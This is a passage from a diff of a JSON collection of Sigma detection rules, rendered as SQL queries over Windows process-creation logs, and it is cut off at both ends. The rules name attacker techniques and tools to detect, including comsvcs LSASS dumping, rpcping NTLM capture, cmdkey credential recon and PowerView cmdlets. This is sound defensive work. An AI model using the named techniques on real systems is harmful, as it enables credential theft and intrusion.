AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_zipexec.yml" + "filename": "proc_creation_win_rundll32_script_run.yml" }, { - "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", - "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "status": "test", - "description": "dotnet.exe will execute any DLL and execute unsigned code", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Registration via cscript.exe", + "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "status": "experimental", + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet.yml" + "filename": 
"proc_creation_win_regsvr32_registration_via_cscript.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.005" + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Hidden Powershell in Link File Pattern", - "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", + "title": "Capture Credentials with Rpcping.exe", + 
"id": "93671f99-04eb-4ab4-a161-70d446a84003", "status": "test", - "description": "Detects events that appear when a user click on a link file with a powershell command in it", - "author": "frack113", + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate commands in .lnk files" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_embed_exe_lnk.yml" + "filename": "proc_creation_win_rpcping_credential_capture.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", + "title": "Hiding Files with Attrib.exe", + "id": "4281cb20-2994-4580-aa63-c8b86d019934", "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "description": "Detects usage of attrib.exe to hide files from users.", + "author": "Sami Ruohonen", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_attrib_hiding_files.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a 
renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", - "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "title": "Dumping Process via Sqldumper.exe", + "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "status": "test", + "description": "Detects process dump via legitimate sqldumper.exe binary", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], - "level": "high", + "falsepositives": [ + "Legitimate MSSQL Server actions" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' 
AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' 
ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "title": "Gpscript Execution", + "id": "1e59c230-6670-45bf-83b0-98903780607e", "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts 
configured in Group Policy", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate uses of logon scripts distributed via group policy" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_lolbin_gpscript.yml" }, { - "title": "Esentutl Gather Credentials", - "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "title": "Sdclt Child Processes", + "id": "da2738f2-fadb-4394-afa7-0a0674885afa", "status": "test", - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "author": "sam0x90", + "description": "A General detection for sdclt spawning new processes. 
This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "To be determined" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_params.yml" + "filename": "proc_creation_win_sdclt_child_process.yml" }, { - "title": "Wusa Extracting Cab Files", - "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", + "title": "Process Reconnaissance Via Wmic.EXE", + "id": "221b251a-357a-49a9-920a-271802777cc0", "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. 
This could indicate an attacker using an old technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + "filename": "proc_creation_win_wmic_recon_process.yml" }, { - "title": "DLL Loaded via CertOC.EXE", - "id": "242301bc-f92f-4476-8718-78004a6efd9f", - "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", - "author": "Austin Songer @austinsonger", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + 
"car.2013-05-009" + ], + "falsepositives": [ + "Unlikely, because no one should dump the process memory in that way" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + }, + { + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - 
"filename": "proc_creation_win_certoc_load_dll.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "Private Keys Reconnaissance Via CommandLine Tools", - "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "author": "frack113", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" + "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_private_keys_recon.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - 